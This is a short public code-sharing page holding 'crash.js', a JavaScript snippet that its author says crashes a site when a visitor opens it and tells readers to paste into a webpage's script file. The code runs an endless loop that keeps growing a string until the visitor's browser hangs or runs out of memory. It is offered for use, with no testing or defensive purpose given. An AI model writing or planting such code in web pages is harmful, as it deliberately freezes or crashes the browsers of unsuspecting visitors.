Skip to content

Instantly share code, notes, and snippets.

@546pvp
546pvp / crash.js
Created December 1, 2021 12:55
This JS script will crash site When client open it
//paste this script into your webpage script file
let crash;
crash = "crash"
let i = true;
while (i = true) {
crash += "crash"
}
alert("HI")